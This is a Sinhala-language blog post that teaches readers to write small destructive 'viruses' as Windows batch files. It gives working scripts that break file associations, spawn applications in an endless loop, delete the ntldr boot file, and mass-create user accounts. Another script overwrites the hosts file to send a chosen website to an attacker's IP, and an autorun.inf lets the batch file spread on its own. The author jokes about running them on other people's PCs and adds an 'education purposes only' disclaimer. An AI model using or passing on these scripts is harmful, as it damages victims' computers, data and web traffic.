Batch File වලින් කරන්න පුළුවන් ඒවා බලමුද..?

6:59 AM


.bat files වලින් අපිට පොඩි Virus ටිකක් හදාගන්න පුළුවන්.. පොඩි උනාට වැඩ කරන්න ගත්තම මෙයාලගේ වැඩ නම් පොඩි නැ ඔන්න.. මෙන්න මේ දෙන Codes NotePad එකට copy කරගෙන save කරනකොට .bat කියලා Save කරන්න... උදාහරණයක් විදියට azone.bat කියලා... දෙන්න යන්නේ නියම Virus Codes ටිකක්....  කරලම බලන්නකෝ... අහ් වැරදුනා නේ.. කරනවා නම් ඔයාලගේ එකේ නම් චෙක් කරලා බලන්න යන්න එපා PC එකට ආදරයක් තියෙනවා නම්... 
කරනවා නම් virtual machine එකක් ගහලා කරලා බලන්න... ලේසි වෙන කෙනෙක්ගේ එකක කරලා බැලුව නම් නේද...? :-D 





1. මේකෙත් එල බඩුවක්...  මේකෙන් extention Change කරනවා... 
ආයේ file ඔපෙන් කරලා හමාරයි... 





@echo off

assoc .txt=log 

assoc .exe=log 

assoc .jpeg=log 

assoc .png=log 

assoc .mpeg=log 



ඔය log කියන තැනට ඔයාල ආසා කරන extention එකක් තියෙනවා නම් එක දාගන්න...




2. මේකට කියමු Application Bomber කියලා 

@echo off 
:x  
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc 
goto x 

මේකෙන් කරන්නේ ඇවිල්ලා ඔකේ තියෙන Application ටික ඔපන් කරවන එක... 


අනික
 ලූප් කරනවා.. අනාතයි නේ එතකොට....


3. මේකෙන් කොරන්නේ අපිට PC එක ON කරනකොට ඕනේ වෙන ntldr file එක මකල දාන එක... ntldr is missing  කියයි ඕන වෙද්දී... පවු වැඩේ...


attrib -S -R -H C:\ntldr  
del ntldr   





4.මෙන්න මේක කාට හරි කියල click කෙරෙව්වොත් අනාතයි ඉතින්... බර ගානක් user account හැදිලා තියෙයි.... 





@echo off

:x

net user %random% /add //create user account

goto x



5.මෙන්න තියෙනවා.. හොදම එක... මේකෙන් ගන්න පුළුවන් වේද නම් අනන්තයි අප්‍රමාණයි.... මලු බාන්න කලින් මේක යවලා හිටිය නම් ගින්දර තමා.... තේරුන් ඇත්තෝ තෙරුන් ගනිත්වා හොදේ....


@echo off
echo xxx.xxx.xxx.xxx www.examplewebsite.com > C:\windows\system32\drivers\etc\hosts




xxx.xxx.xxx.xxx එකට ඔයාට එයාව යවන්න ඕන Site එකේ IP එක දෙන්න...  examplewebsite කියන තැනට දෙන්න එයාට පෙන්න ඕනේ website එක.. නිකන් DNS Poisoning වගේ නේද... :-D 







ආ ඕක Auto Copy වෙලා ව්‍යාප්ත කරවන්න නම් මේක ඕනේ වෙයි....





[autorun]
open=example.bat
Icon=example.ico




ඔකේ example කියන තැනට execute කරන්න ඕනේ bat file එකේ නම දෙන්නකෝ.... ඊටපස්සේ Autorun.inf කියල save කරන්නකෝ... ඊට පස්සේ autorun එකයි bat file එකයි එකම තැනක තියන්න මතක් කරලා...
මෙව්වා ඔක්කොම Education Purposes only හරිය....
Like එකක් Comment එකක් දාල යන්න අමතක කරන්න එපා......






Share this

Amila Thisura is a tech geek who's been writing about everything technology-related for years. When he's not writing about gadgets and software, he's probably using them in his spare time.

Related Posts

EmoticonEmoticon

:)
:(
=(
^_^
:D
=D
=)D
|o|
@@,
;)
:-bd
:-d
:p
:ng